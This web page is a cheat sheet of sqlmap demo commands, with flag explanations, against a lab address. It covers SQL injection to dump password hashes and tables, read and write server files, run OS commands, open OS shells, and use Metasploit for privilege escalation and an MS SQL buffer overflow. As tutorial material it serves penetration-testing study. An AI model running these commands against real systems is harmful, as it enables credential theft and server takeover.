Skip to content

sqlmap

Resources

demo 1 :

Extensively fingerprint the back-end database management system, enumerate banner, session user, current database, users, users's password hashes, database

sqlmap -u http://192.168.43.7/index.php?id=1 -f -b --current-user --current-db --users --password --dbs -v 0
  • -u : target url
  • -f : extensively fingerprint the back-end DBMS
  • -b : retrieve DBMS banner
  • --current-user : retrieve session user
  • --current-db : retrieve current database
  • --users : enumerate database users
  • --password : enumerate database users's password hashes
  • --dbs : enumerate available databases
  • -v : output verbosity level (0, warning)

demo 2 :

Retrieve the database management system banner and enumerate the password hashes for the database session user via UNION query SQL injection

sqlmap -u "" -b --password -U CU --union-use -v 2
  • -U : specify the database user (CU, alias for current user)
  • --union-use : retrieve data via UNION query SQL inject, if possible

demo 3 :

Dump only from the second to the third entry of column surname of table users

sqlmap -u "" --dump -T users -C surname -D testdb --start 2 --stop 3 -v 2
  • --dump : dumb table entries
  • -T : table to dump
  • -C : columns to dump
  • --start : first entry to dump
  • --stop : last entry to dump

demo 4 :

Enumerate and dump entries of all databases' tables containing only one or more columns specified by the user

sqlmap -u "" --dump -C 'user,pass' -v 1 --exclude-sysdbs
  • --exclude-sysdbs : ignore system databases

demo 5 :

interactive SQL shell

sqlmap -u "" --sql-shell -v 2
  • --sql-shell : spawn an interactive SQL shell

demo 6 :

sqlmap reads a file from the underlying file system and stores it locally

sqlmap -u "" --read-file "C:\example.txt" -v 2
  • --read-file : file to read from the underlying file system

demo 7 :

sqlmap uploads a file from the local file system to the database server underlying file system and checks afterward for consistency

sqlmap -u "" --write-file /etc/passwd --dest-file /tmp/writetest -v 2
  • --write-file : file to upload to the underlying file system(/etc/passwd)
  • --dest-file : absolute file system path to write to(/tmp/writetest)

demo 8 :

Operating system command execution via user-defined function injection

sqlmap -u "" --os-cmd "id" -v 1
  • --os-cmd : operating system command to execute(id)

demo 9 :

Interactive shell where the user can execute operating system commands via user-defined function injection

sqlmap -u "" --os-shell -v 1 --union-use
  • --os-shell : spawn an inteactive command prompt

demo 1 :

sqlmap -u "" --os-pwn --msf-path /home/unquis/software/metasploit --priv-esc -v 1
  • --os-pwn : establish an out-of-band connection between the user and the database server
  • --msf-path : metasploit file system path
  • --priv-esc : try to elevate the database process user privileges to SYSTEM

demo 1 :

sqlmap -u "" --os-bof -v 1 --msf-path ~/software/metasploit
  • --os-bof : establish an out-of-band connection between the user and the database server by exploiting microsoft sql server buffer overflow